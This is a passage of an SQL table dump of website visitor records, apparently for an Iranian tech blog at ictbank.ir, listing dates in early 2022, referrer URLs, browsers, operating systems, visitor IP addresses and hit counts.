(19687,'2022-03-28','https://www.google.com/','Safari','OS X','10.15.7',NULL,NULL,'','135.180.108.33','000',0,2,0),
(19688,'2022-03-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','134.17.130.51','000',0,1,0),
(19689,'2022-03-28','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','49.248.39.178','000',0,1,0),
(19690,'2022-03-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,1,0),
(19691,'2022-03-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(19692,'2022-03-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.248.165.245','000',0,2,0),
(19693,'2022-03-28','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','163.172.106.33','000',0,6,0),
(19694,'2022-03-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(19695,'2022-03-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','173.252.87.10','000',0,1,0),
(19696,'2022-03-28','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','192.99.100.141','000',0,39,0),
(19697,'2022-03-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','148.66.146.22','000',0,1,0),
(19698,'2022-03-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','95.181.217.141','000',0,12,0),
(19699,'2022-03-28','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','198.46.175.46','000',0,2,0),
(19700,'2022-03-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.23.253','000',0,1,0),
(19701,'2022-03-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.204','000',0,1,0),
(19702,'2022-03-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.195','000',0,2,0),
(19703,'2022-03-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.82','000',0,2,0),
(19704,'2022-03-28','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.48','000',0,2,0),
(19705,'2022-03-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(19706,'2022-03-28','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','217.138.193.104','000',0,2,0),
(19707,'2022-03-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.66','000',0,2,0),
(19708,'2022-03-28','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','209.23.9.25','000',0,1,0),
(19709,'2022-03-28','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.185.134.116','000',0,2,0),
(19710,'2022-03-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(19711,'2022-03-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(19712,'2022-03-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19713,'2022-03-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19714,'2022-03-28','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','116.202.209.244','000',0,9,0),
(19715,'2022-03-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.11','000',0,2,0),
(19716,'2022-03-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,10,0),
(19717,'2022-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.159.230.83','000',0,1,0),
(19718,'2022-03-29','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','216.151.184.111','000',0,14,0),
(19719,'2022-03-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.21','000',0,1,0),
(19720,'2022-03-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(19721,'2022-03-29','http://ictbank.ir','Chrome','OS X','10.6.6',NULL,NULL,'','185.220.101.58','000',0,2,0),
(19722,'2022-03-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','144.172.73.66','000',0,1,0),
(19723,'2022-03-29','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.186','000',0,1,0),
(19724,'2022-03-29','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','201.94.158.56','000',0,1,0),
(19725,'2022-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.93.17','000',0,1,0),
(19726,'2022-03-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(19727,'2022-03-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19728,'2022-03-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(19729,'2022-03-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19730,'2022-03-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19731,'2022-03-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(19732,'2022-03-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','223.242.246.166','000',0,1,0),
(19733,'2022-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.248.168.222','000',0,2,0),
(19734,'2022-03-29','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','108.62.116.172','000',0,5,0),
(19735,'2022-03-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(19736,'2022-03-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.204.46','000',0,2,0),
(19737,'2022-03-29','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.232.178.238','000',0,1,0),
(19738,'2022-03-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.240.67.28','000',0,2,0),
(19739,'2022-03-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.46.106.145','000',0,1,0),
(19740,'2022-03-30','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(19741,'2022-03-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(19742,'2022-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.234.165','000',0,25,0),
(19743,'2022-03-30','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','216.151.184.111','000',0,1,0),
(19744,'2022-03-30','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','193.219.32.178','000',0,1,0),
(19745,'2022-03-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.163','000',0,2,0),
(19746,'2022-03-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,2,0),
(19747,'2022-03-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(19748,'2022-03-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.244.55','000',0,2,0),
(19749,'2022-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.83.117','000',0,1,0),
(19750,'2022-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.177.170','000',0,1,0),
(19751,'2022-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.141.254','000',0,1,0),
(19752,'2022-03-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.120.207','000',0,1,0),
(19753,'2022-03-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(19754,'2022-03-30','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','31.56.110.246','000',0,5,0),
(19755,'2022-03-30','http://ictbank.ir/blog','Unknown','iOS','11.3',NULL,NULL,'','113.120.8.105','000',0,1,0),
(19756,'2022-03-30','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.4','000',0,8,0),
(19757,'2022-03-31','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','167.86.78.234','000',0,4,0),
(19758,'2022-03-31','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.111.42.6','000',0,4,0),
(19759,'2022-03-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.50','000',0,2,0),
(19760,'2022-03-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19761,'2022-03-31','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.201.224.107','000',0,1,0),
(19762,'2022-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.43.8.119','000',0,2,0),
(19763,'2022-03-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','143.110.243.141','000',0,2,0),
(19764,'2022-03-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(19765,'2022-03-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','77.65.215.1','000',0,1,0),
(19766,'2022-03-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,5,0),
(19767,'2022-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.162.158','000',0,1,0),
(19768,'2022-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.233.62','000',0,1,0),
(19769,'2022-03-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(19770,'2022-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.46','000',0,1,0),
(19771,'2022-03-31','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(19772,'2022-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.223.225.147','000',0,2,0),
(19773,'2022-03-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.88.45','000',0,1,0),
(19774,'2022-03-31','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.218','000',0,1,0),
(19775,'2022-03-31','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.43','000',0,1,0),
(19776,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','10.11.5',NULL,NULL,'','212.115.42.245','000',0,1,0),
(19777,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.41','000',0,1,0),
(19778,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.191','000',0,1,0),
(19779,'2022-04-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.146.185','000',0,2,0),
(19780,'2022-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.156.30','000',0,2,0),
(19781,'2022-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.166.105.150','000',0,2,0),
(19782,'2022-04-01','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','114.79.55.224','000',0,5,0),
(19783,'2022-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.86.146','000',0,2,0),
(19784,'2022-04-01','http://www.google.com/','Chrome','Android','9',NULL,NULL,'','5.123.81.191','000',0,1,0),
(19785,'2022-04-01','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','6.1',NULL,NULL,'','176.106.247.22','000',0,2,0),
(19786,'2022-04-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(19787,'2022-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.151.184.112','000',0,1,0),
(19788,'2022-04-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.100.255','000',0,1,0),
(19789,'2022-04-01','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.24.99','000',0,2,0),
(19790,'2022-04-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19791,'2022-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.159.88','000',0,1,0),
(19792,'2022-04-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.252.127','000',0,1,0),
(19793,'2022-04-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(19794,'2022-04-01','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.41.211','000',0,1,0),
(19795,'2022-04-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(19796,'2022-04-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19797,'2022-04-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(19798,'2022-04-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19799,'2022-04-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(19800,'2022-04-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,1,0),
(19801,'2022-04-01','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','89.163.145.114','000',0,2,0),
(19802,'2022-04-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(19803,'2022-04-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.216','000',0,2,0),
(19804,'2022-04-01','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,1,0),
(19805,'2022-04-01','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.222','000',0,3,0),
(19806,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.197','000',0,1,0),
(19807,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.196','000',0,1,0),
(19808,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','36.99.136.137','000',0,2,0),
(19809,'2022-04-01','http://wikisonnati.com/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.42.155','000',0,1,0),
(19810,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.49','000',0,1,0),
(19811,'2022-04-01','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','37.0.8.124','000',0,1,0),
(19812,'2022-04-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.194.181','000',0,1,0),
(19813,'2022-04-02','http://ictbank.ir/blog','Firefox','Fedora','9',NULL,NULL,'','199.249.230.71','000',0,6,0),
(19814,'2022-04-02','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.134.236','000',0,1,0),
(19815,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,2,0),
(19816,'2022-04-02','https://www.google.com/','Chrome','OS X','10.10.5',NULL,NULL,'','162.213.78.174','000',0,1,0),
(19817,'2022-04-02','https://www.bing.com','Chrome','Linux','Unknown',NULL,NULL,'','103.240.34.130','000',0,3,0),
(19818,'2022-04-02','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','151.238.90.71','000',0,7,0),
(19819,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.156.90.65','000',0,1,0),
(19820,'2022-04-02','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(19821,'2022-04-02','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.199','000',0,2,0),
(19822,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.245.159.239','000',0,1,0),
(19823,'2022-04-02','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.214','000',0,1,0),
(19824,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','222.87.139.44','000',0,4,0),
(19825,'2022-04-02','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.195','000',0,3,0),
(19826,'2022-04-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(19827,'2022-04-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,6,0),
(19828,'2022-04-02','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,2,0),
(19829,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.35.104','000',0,1,0),
(19830,'2022-04-02','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.194','000',0,2,0),
(19831,'2022-04-02','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','102.176.94.209','000',0,1,0),
(19832,'2022-04-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(19833,'2022-04-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','185.87.148.103','000',0,1,0),
(19834,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.103','000',0,1,0),
(19835,'2022-04-02','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.120','000',0,1,0),
(19836,'2022-04-02','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.115','000',0,1,0),
(19837,'2022-04-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(19838,'2022-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(19839,'2022-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(19840,'2022-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19841,'2022-04-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(19842,'2022-04-02','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','128.73.110.204','000',0,2,0),
(19843,'2022-04-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(19844,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.130.199.0','000',0,1,0),
(19845,'2022-04-02','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.82','000',0,2,0),
(19846,'2022-04-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.209.253.156','000',0,2,0),
(19847,'2022-04-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19848,'2022-04-03','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.234.160.55','000',0,2,0),
(19849,'2022-04-03','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.214','000',0,2,0),
(19850,'2022-04-03','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','18.162.225.124','000',0,1,0),
(19851,'2022-04-03','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','144.168.254.76','000',0,21,0),
(19852,'2022-04-03','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','154.202.105.28','000',0,2,0),
(19853,'2022-04-03','https://www.bing.com','Chrome','OS X','10.8.0',NULL,NULL,'','138.197.143.129','000',0,1,0),
(19854,'2022-04-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(19855,'2022-04-03','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.134.116','000',0,1,0),
(19856,'2022-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.87.69','000',0,1,0),
(19857,'2022-04-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(19858,'2022-04-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.62.177.203','000',0,1,0),
(19859,'2022-04-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','65.154.226.100','000',0,1,0),
(19860,'2022-04-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.56','000',0,2,0),
(19861,'2022-04-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(19862,'2022-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.46.173','000',0,1,0),
(19863,'2022-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.107.112','000',0,1,0),
(19864,'2022-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19865,'2022-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(19866,'2022-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19867,'2022-04-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,4,0),
(19868,'2022-04-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,2,0),
(19869,'2022-04-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(19870,'2022-04-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(19871,'2022-04-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,4,0),
(19872,'2022-04-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.43','000',0,1,0),
(19873,'2022-04-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.56.169.117','000',0,2,0),
(19874,'2022-04-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(19875,'2022-04-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.41','000',0,2,0),
(19876,'2022-04-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.56','000',0,2,0),
(19877,'2022-04-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,2,0),
(19878,'2022-04-04','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','109.69.108.104','000',0,13,0),
(19879,'2022-04-04','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','170.83.176.93','000',0,2,0),
(19880,'2022-04-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19881,'2022-04-04','https://www.google.ru/','Yandex Browser','OS X','10.15.7',NULL,NULL,'','46.73.139.171','000',0,1,0),
(19882,'2022-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.133.237','000',0,1,0),
(19883,'2022-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.40.244.118','000',0,8,0),
(19884,'2022-04-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','102.129.145.27','000',0,3,0),
(19885,'2022-04-04','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.98','000',0,1,0),
(19886,'2022-04-04','https://www.bing.com','Chrome','Windows','6.4',NULL,NULL,'','139.59.228.139','000',0,3,0),
(19887,'2022-04-04','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','104.36.19.137','000',0,1,0),
(19888,'2022-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(19889,'2022-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(19890,'2022-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,2,0),
(19891,'2022-04-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(19892,'2022-04-04','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','162.253.68.211','000',0,5,0),
(19893,'2022-04-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','85.15.110.102','000',0,2,0),
(19894,'2022-04-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.165.86.114','000',0,1,0),
(19895,'2022-04-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,4,0),
(19896,'2022-04-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(19897,'2022-04-05','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.249.169.228','000',0,1,0),
(19898,'2022-04-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,5,0),
(19899,'2022-04-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','23.128.248.10','000',0,1,0),
(19900,'2022-04-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.220.102.254','000',0,1,0),
(19901,'2022-04-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(19902,'2022-04-05','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.250.144.80','000',0,1,0),
(19903,'2022-04-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','195.181.168.177','000',0,1,0),
(19904,'2022-04-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(19905,'2022-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.208.112.67','000',0,2,0),
(19906,'2022-04-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(19907,'2022-04-05','https://duckduckgo.com/','Firefox','Windows','10.0',NULL,NULL,'','94.198.190.206','000',0,1,0),
(19908,'2022-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.39.57','000',0,1,0),
(19909,'2022-04-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(19910,'2022-04-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,2,0),
(19911,'2022-04-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19912,'2022-04-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(19913,'2022-04-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','95.216.198.70','000',0,2,0),
